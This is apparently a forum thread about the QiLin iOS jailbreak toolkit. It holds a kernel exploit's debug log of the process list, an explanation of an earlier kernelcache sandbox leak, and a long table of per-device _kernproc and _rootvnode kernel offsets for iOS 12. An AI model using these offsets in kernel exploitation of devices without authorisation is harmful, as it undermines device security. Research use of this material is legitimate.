2019-02-13 15:47:26.079894+0100 v3ntex[195:2838] DEBUG: Process 107@0xfffffff002a30000 - MTLCompilerServi
2019-02-13 15:47:26.079928+0100 v3ntex[195:2838] DEBUG: Process 108@0xfffffff00183a000 - tccd
2019-02-13 15:47:26.080069+0100 v3ntex[195:2838] DEBUG: Process 109@0xfffffff002ba87f0 - BlueTool
2019-02-13 15:47:26.080151+0100 v3ntex[195:2838] DEBUG: Process 110@0xfffffff002ba83f8 - trustd
2019-02-13 15:47:26.080341+0100 v3ntex[195:2838] DEBUG: Process 111@0xfffffff002ba8000 - contextstored
2019-02-13 15:47:26.080379+0100 v3ntex[195:2838] DEBUG: Process 113@0xfffffff002f357f0 - geod
2019-02-13 15:47:26.080413+0100 v3ntex[195:2838] DEBUG: Process 114@0xfffffff002f353f8 - accountsd
2019-02-13 15:47:26.080446+0100 v3ntex[195:2838] DEBUG: Process 115@0xfffffff002f35000 - biometrickitd
2019-02-13 15:47:26.080480+0100 v3ntex[195:2838] DEBUG: Process 116@0xfffffff002f35be8 - symptomsd
2019-02-13 15:47:26.080513+0100 v3ntex[195:2838] DEBUG: Process 117@0xfffffff0032787f0 - calaccessd
2019-02-13 15:47:26.080546+0100 v3ntex[195:2838] DEBUG: Process 118@0xfffffff003278be8 - ctkd
2019-02-13 15:47:26.080579+0100 v3ntex[195:2838] DEBUG: Process 119@0xfffffff0032783f8 - pkd
2019-02-13 15:47:26.080612+0100 v3ntex[195:2838] DEBUG: Process 120@0xfffffff003278000 - medialibraryd
2019-02-13 15:47:26.080646+0100 v3ntex[195:2838] DEBUG: Process 121@0xfffffff0033c37f0 - misagent
2019-02-13 15:47:26.080679+0100 v3ntex[195:2838] DEBUG: Process 122@0xfffffff0033c33f8 - MobileStorageMou
2019-02-13 15:47:26.080796+0100 v3ntex[195:2838] DEBUG: Process 123@0xfffffff0033c3000 - setoken
2019-02-13 15:47:26.080831+0100 v3ntex[195:2838] DEBUG: Process 125@0xfffffff0035e53f8 - tailspind
2019-02-13 15:47:26.080864+0100 v3ntex[195:2838] DEBUG: Process 126@0xfffffff0035e5000 - analyticsd
2019-02-13 15:47:26.080897+0100 v3ntex[195:2838] DEBUG: Process 127@0xfffffff0035e57f0 - AGXCompilerServi
2019-02-13 15:47:26.080930+0100 v3ntex[195:2838] DEBUG: Process 128@0xfffffff0035e5be8 - callservicesd
2019-02-13 15:47:26.080964+0100 v3ntex[195:2838] DEBUG: Process 130@0xfffffff0039613f8 - duetexpertd
2019-02-13 15:47:26.080997+0100 v3ntex[195:2838] DEBUG: Process 131@0xfffffff0039617f0 - passd
2019-02-13 15:47:26.081041+0100 v3ntex[195:2838] DEBUG: Process 133@0xfffffff0038b43f8 - IMDPersistenceAg
2019-02-13 15:47:26.081074+0100 v3ntex[195:2838] DEBUG: Process 134@0xfffffff0038b47f0 - syncdefaultsd
2019-02-13 15:47:26.081107+0100 v3ntex[195:2838] DEBUG: Process 135@0xfffffff0038b4be8 - companion_proxy
2019-02-13 15:47:26.081334+0100 v3ntex[195:2838] DEBUG: Process 136@0xfffffff0038b4000 - afcd
2019-02-13 15:47:26.081373+0100 v3ntex[195:2838] DEBUG: Process 137@0xfffffff003d893f8 - useractivityd
2019-02-13 15:47:26.081504+0100 v3ntex[195:2838] DEBUG: Process 138@0xfffffff003d897f0 - lsdiconservice
2019-02-13 15:47:26.081542+0100 v3ntex[195:2838] DEBUG: Process 139@0xfffffff003d89be8 - mobile_assertion
2019-02-13 15:47:26.081577+0100 v3ntex[195:2838] DEBUG: Process 140@0xfffffff003d89000 - notification_pro
2019-02-13 15:47:26.081610+0100 v3ntex[195:2838] DEBUG: Process 141@0xfffffff003f4d3f8 - softwareupdatese
2019-02-13 15:47:26.081644+0100 v3ntex[195:2838] DEBUG: Process 142@0xfffffff003f4d7f0 - captiveagent
2019-02-13 15:47:26.081677+0100 v3ntex[195:2838] DEBUG: Process 143@0xfffffff003f4d000 - deleted
2019-02-13 15:47:26.081711+0100 v3ntex[195:2838] DEBUG: Process 144@0xfffffff003f4dbe8 - com.apple.Mobile
2019-02-13 15:47:26.081823+0100 v3ntex[195:2838] DEBUG: Process 145@0xfffffff0041607f0 - com.apple.Mobile
2019-02-13 15:47:26.081857+0100 v3ntex[195:2838] DEBUG: Process 146@0xfffffff0041603f8 - com.apple.Mobile
2019-02-13 15:47:26.081891+0100 v3ntex[195:2838] DEBUG: Process 147@0xfffffff004160be8 - xpcroleaccountd
2019-02-13 15:47:26.081924+0100 v3ntex[195:2838] DEBUG: Process 148@0xfffffff004160000 - mobile_storage_p
2019-02-13 15:47:26.081958+0100 v3ntex[195:2838] DEBUG: Process 149@0xfffffff0043297f0 - pipelined
2019-02-13 15:47:26.081991+0100 v3ntex[195:2838] DEBUG: Process 150@0xfffffff0043293f8 - voiced
2019-02-13 15:47:26.082024+0100 v3ntex[195:2838] DEBUG: Process 151@0xfffffff004329000 - vmd
2019-02-13 15:47:26.082057+0100 v3ntex[195:2838] DEBUG: Process 152@0xfffffff004329be8 - com.apple.CallKi
2019-02-13 15:47:26.082091+0100 v3ntex[195:2838] DEBUG: Process 153@0xfffffff0044993f8 - itunesstored
2019-02-13 15:47:26.082124+0100 v3ntex[195:2838] DEBUG: Process 154@0xfffffff0044997f0 - appstored
2019-02-13 15:47:26.082217+0100 v3ntex[195:2838] DEBUG: Process 155@0xfffffff004499be8 - bookassetd
2019-02-13 15:47:26.082251+0100 v3ntex[195:2838] DEBUG: Process 156@0xfffffff004499000 - fmfd
2019-02-13 15:47:26.082295+0100 v3ntex[195:2838] DEBUG: Process 157@0xfffffff004519000 - suggestd
2019-02-13 15:47:26.082327+0100 v3ntex[195:2838] DEBUG: Process 158@0xfffffff0045193f8 - installcoordinat
2019-02-13 15:47:26.082361+0100 v3ntex[195:2838] DEBUG: Process 159@0xfffffff0045197f0 - backupd
2019-02-13 15:47:26.082394+0100 v3ntex[195:2838] DEBUG: Process 160@0xfffffff004519be8 - familycircled
2019-02-13 15:47:26.082564+0100 v3ntex[195:2838] DEBUG: Process 164@0xfffffff0045153f8 - searchd
2019-02-13 15:47:26.082612+0100 v3ntex[195:2838] DEBUG: Process 166@0xfffffff004515000 - AGXCompilerServi
2019-02-13 15:47:26.083225+0100 v3ntex[195:2838] DEBUG: Process 167@0xfffffff004515be8 - networkservicepr
fr3nsis
 
Posts: 3
Joined: Tue Jan 15, 2019 8:56 am

Re: QiLin now supports iOS 12.1.1

Postby morpheus » Thu Feb 14, 2019 2:30 am

So, explaining this kernproc etc issue:

The original QiLin could read symbols straight off the kernelcache. This was because AAPL forgot to sandbox access to /S/L/Caches, which held the kernel cache (and, fun fact, the apticket.der, which provided a unique identification of the device :-) . It was my fault for disclosing the bug (To my 17.x.x.x readers, thanks for not crediting the bug..).

QiLin will eventually be updated to get the symbols out of the kernel proper (because kernel_task can read from kernel_base). Till then, the short term workaround which *requires no patching* is to simply call void setKernelSymbol (char *Symbol, uint64_t Address);

Now, I did put in offsets for kernproc for lots of architecture (thanks to @FCE365) but not all of them. When you do set a symbol, you need to set the global as would be exported by the kernel - which in kernproc's case is the POINTER TO. Hence the confusion in values. Presently defined offsets in QiLin are:

Code: Select all
//iOS 12.1.2 - iPhone X
{ "12.1.1", "iPhone11,2", "D331AP", "_kernproc", 0xfffffff00913c638},
{ "12.1.2", "iPhone11,6", "D331AP", "_kernproc", 0xfffffff00913c638},
{ "12.1.1", "iPhone11,6", "D331AP", "_kernproc", 0xfffffff00913c638},


{ "12.1.1", "iPhone10,6", "D221AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,6", "D221AP", "_kernproc", 0xfffffff0076660d8},

//iOS 12.1.1 - iPhone X
{ "12.1.1", "iPhone10,6", "D221AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,6", "D221AP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1 - iPhone X
{ "12.1", "iPhone10,6", "D221AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone10,6", "D221AP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0.1 - iPhone X
{ "12.0.1", "iPhone10,6", "D221AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,6", "D221AP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0 - iPhone X
{ "12.0", "iPhone10,6", "D221AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,6", "D221AP", "_kernproc", 0xfffffff00766a0d8},

//iOS 12.1.2 - iPhone 8 Plus
{ "12.1.2", "iPhone10,5", "D211AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,5", "D211AP", "_kernproc", 0xfffffff0076660d8},
{ "12.1.2", "iPhone10,5", "D211AAP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,5", "D211AAP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1.1 - iPhone 8 Plus
{ "12.1.1", "iPhone10,5", "D211AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,5", "D211AP", "_kernproc", 0xfffffff0076660d8},
{ "12.1.1", "iPhone10,5", "D211AAP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,5", "D211AAP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1 - iPhone 8 Plus
{ "12.1", "iPhone10,5", "D211AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone10,5", "D211AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.1", "iPhone10,5", "D211AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone10,5", "D211AAP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0.1 - iPhone 8 Plus
{ "12.0.1", "iPhone10,5", "D211AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,5", "D211AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.0.1", "iPhone10,5", "D211AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,5", "D211AAP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0 - iPhone 8 Plus
{ "12.0", "iPhone10,5", "D211AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,5", "D211AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.0", "iPhone10,5", "D211AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,5", "D211AAP", "_kernproc", 0xfffffff00766a0d8},


//iOS 12.1.2 - iPhone 8
{ "12.1.2", "iPhone10,4", "D201AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,4", "D201AP", "_kernproc", 0xfffffff0076660d8},
{ "12.1.2", "iPhone10,4", "D201AAP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,4", "D201AAP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1.1 - iPhone 8
{ "12.1.1", "iPhone10,4", "D201AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,4", "D201AP", "_kernproc", 0xfffffff0076660d8},
{ "12.1.1", "iPhone10,4", "D201AAP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,4", "D201AAP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.0.1 - iPhone 8
{ "12.0.1", "iPhone10,4", "D201AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,4", "D201AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.0.1", "iPhone10,4", "D201AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,4", "D201AAP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0 - iPhone 8
{ "12.0", "iPhone10,4", "D201AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,4", "D201AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.0", "iPhone10,4", "D201AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,4", "D201AAP", "_kernproc", 0xfffffff00766a0d8},


//iOS 12.1.2 - iPhone X
{ "12.1.2", "iPhone10,3", "D22AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,3", "D22AP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1.1 - iPhone X
{ "12.1.1", "iPhone10,3", "D22AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,3", "D22AP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1 - iPhone X
{ "12.1", "iPhone10,3", "D22AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone10,3", "D22AP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0.1 - iPhone X
{ "12.0.1", "iPhone10,3", "D22AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,3", "D22AP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0 - iPhone X
{ "12.0", "iPhone10,3", "D22AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,3", "D22AP", "_kernproc", 0xfffffff00766a0d8},


//iOS 12.1.2 - iPhone 8 Plus
{ "12.1.2", "iPhone10,2", "D21AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,2", "D21AP", "_kernproc", 0xfffffff0076660d8},

{ "12.1.2", "iPhone10,2", "D21AAP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,2", "D21AAP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1.1 - iPhone 8 Plus
{ "12.1.1", "iPhone10,2", "D21AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,2", "D21AP", "_kernproc", 0xfffffff0076660d8},
{ "12.1.1", "iPhone10,2", "D21AAP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,2", "D21AAP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1 - iPhone 8 Plus
{ "12.1", "iPhone10,2", "D21AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone10,2", "D21AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.1", "iPhone10,2", "D21AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone10,2", "D21AAP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0.1 - iPhone 8 Plus
{ "12.0.1", "iPhone10,2", "D21AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,2", "D21AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.0.1", "iPhone10,2", "D21AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,2", "D21AAP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0.1 - iPhone 8 Plus
{ "12.0", "iPhone10,2", "D21AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,2", "D21AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.0", "iPhone10,2", "D21AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,2", "D21AAP", "_kernproc", 0xfffffff00766a0d8},


//iOS 12.1.2 - iPhone 8
{ "12.1.2", "iPhone10,1", "D20AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,1", "D20AP", "_kernproc", 0xfffffff0076660d8},
{ "12.1.2", "iPhone10,1", "D20AAP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,1", "D20AAP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1.1 - iPhone 8
{ "12.1.1", "iPhone10,1", "D20AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,1", "D20AP", "_kernproc", 0xfffffff0076660d8},
{ "12.1.1", "iPhone10,1", "D20AAP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,1", "D20AAP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1 - iPhone 8
{ "12.1", "iPhone10,1", "D20AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone10,1", "D20AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.1", "iPhone10,1", "D20AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone10,1", "D20AAP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0.1 - iPhone 8
{ "12.0.1", "iPhone10,1", "D20AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,1", "D20AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.0.1", "iPhone10,1", "D20AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,1", "D20AAP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0 - iPhone 8
{ "12.0", "iPhone10,1", "D20AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,1", "D20AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.0", "iPhone10,1", "D20AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,1", "D20AAP", "_kernproc", 0xfffffff00766a0d8},


//iOS 12.1.2 - iPhone 7 Plus
{ "12.1.2", "iPhone9,4", "D111AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1.2", "iPhone9,4", "D111AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.1.1 - iPhone 7 Plus
{ "12.1.1", "iPhone9,4", "D111AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1.1", "iPhone9,4", "D111AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.1 - iPhone 7 Plus
{ "12.1", "iPhone9,4", "D111AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1", "iPhone9,4", "D111AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.0.1 - iPhone 7 Plus
{ "12.0.1", "iPhone9,4", "D111AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.0.1", "iPhone9,4", "D111AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.0 - iPhone 7 Plus
{ "12.0", "iPhone9,4", "D111AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.0", "iPhone9,4", "D111AP", "_kernproc", 0xfffffff0076420d0},


//iOS 12.1.2 - iPhone 7
{ "12.1.2", "iPhone9,3", "D101AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1.2", "iPhone9,3", "D101AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.1 - iPhone 7
{ "12.1", "iPhone9,3", "D101AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone9,3", "D101AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.1.1 - iPhone 7
{ "12.1.1", "iPhone9,3", "D101AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1.1", "iPhone9,3", "D101AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.0.1 - iPhone 7
{ "12.0.1", "iPhone9,3", "D101AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.0.1", "iPhone9,3", "D101AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.0 - iPhone 7
{ "12.0", "iPhone9,3", "D101AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.0", "iPhone9,3", "D101AP", "_kernproc", 0xfffffff0076420d0},


//iOS 12.1.2 - iPhone 7 Plus
{ "12.1.2", "iPhone9,2", "D11AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1.2", "iPhone9,2", "D11AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.1.1 - iPhone 7 Plus
{ "12.1.1", "iPhone9,2", "D11AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1.1", "iPhone9,2", "D11AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.1 - iPhone 7 Plus
{ "12.1", "iPhone9,2", "D11AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1", "iPhone9,2", "D11AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.0.1 - iPhone 7 Plus
{ "12.0.1", "iPhone9,2", "D11AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.0.1", "iPhone9,2", "D11AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.0 - iPhone 7 Plus
{ "12.0", "iPhone9,2", "D11AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.0", "iPhone9,2", "D11AP", "_kernproc", 0xfffffff0076420d0},


//iOS 12.1.2 - iPhone 7
{ "12.1.2", "iPhone9,1", "D10AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1.2", "iPhone9,1", "D10AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.1.1 - iPhone 7
{ "12.1.1", "iPhone9,1", "D10AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1.1", "iPhone9,1", "D10AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.1 - iPhone 7
{ "12.1", "iPhone9,1", "D10AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1", "iPhone9,1", "D10AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.0.1 - iPhone 7
{ "12.0.1", "iPhone9,1", "D10AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.0.1", "iPhone9,1", "D10AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.0 - iPhone 7
{ "12.0", "iPhone9,1", "D10AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.0", "iPhone9,1", "D10AP", "_kernproc", 0xfffffff0076420d0},


//iOS 12.1.2 - iPhone SE
{ "12.1.2", "iPhone8,4", "N69AP", "_rootvnode", 0xfffffff0076020b8},
{ "12.1.2", "iPhone8,4", "N69AP", "_kernproc", 0xfffffff0076020d0},
{ "12.1.2", "iPhone8,4", "N69uAP", "_rootvnode", 0xfffffff0076020b8},
{ "12.1.2", "iPhone8,4", "N69uAP", "_kernproc", 0xfffffff0076020d0},
//iOS 12.1.1 - iPhone SE
{ "12.1.1", "iPhone8,4", "N69AP", "_rootvnode", 0xfffffff0076020b8},
{ "12.1.1", "iPhone8,4", "N69AP", "_kernproc", 0xfffffff0076020d0},
{ "12.1.1", "iPhone8,4", "N69uAP", "_rootvnode", 0xfffffff0076020b8},
{ "12.1.1", "iPhone8,4", "N69uAP", "_kernproc", 0xfffffff0076020d0},
//iOS 12.1 - iPhone SE
{ "12.1", "iPhone8,4", "N69AP", "_rootvnode", 0xfffffff0076020b8},
{ "12.1", "iPhone8,4", "N69AP", "_kernproc", 0xfffffff0076020d0},
{ "12.1", "iPhone8,4", "N69uAP", "_rootvnode", 0xfffffff0076020b8},
{ "12.1", "iPhone8,4", "N69uAP", "_kernproc", 0xfffffff0076020d0},
//iOS 12.0.1 - iPhone SE
{ "12.0.1", "iPhone8,4", "N69AP", "_rootvnode", 0xfffffff0076020b8},
{ "12.0.1", "iPhone8,4", "N69AP", "_kernproc", 0xfffffff0076020d0},
{ "12.0.1", "iPhone8,4", "N69uAP", "_rootvnode", 0xfffffff0076020b8},
{ "12.0.1", "iPhone8,4", "N69uAP", "_kernproc", 0xfffffff0076020d0},
//iOS 12.0 - iPhone SE
{ "12.0", "iPhone8,4", "N69AP", "_rootvnode", 0xfffffff0076020b8},
{ "12.0", "iPhone8,4", "N69AP", "_kernproc", 0xfffffff0076020d0},
{ "12.0", "iPhone8,4", "N69uAP", "_rootvnode", 0xfffffff0076020b8},
{ "12.0", "iPhone8,4", "N69uAP", "_kernproc", 0xfffffff0076020d0},



Also, jtool2 is one step away from another release and 5,000+ symbols, two of which will be _rootvnode and _kernproc..

So stay tuned..
morpheus
Site Admin
 
Posts: 723
Joined: Thu Apr 11, 2013 6:24 pm

Re: QiLin now supports iOS 12.1.1

Postby fr3nsis » Thu Feb 14, 2019 10:01 am

thanks!
my problem with setKernelSymbol is bad address ... now qilin as you said works fine without patch
fr3nsis
 
Posts: 3
Joined: Tue Jan 15, 2019 8:56 am


Return to QiLin (麒麟)

Who is online

Users browsing this forum: No registered users and 1 guest

cron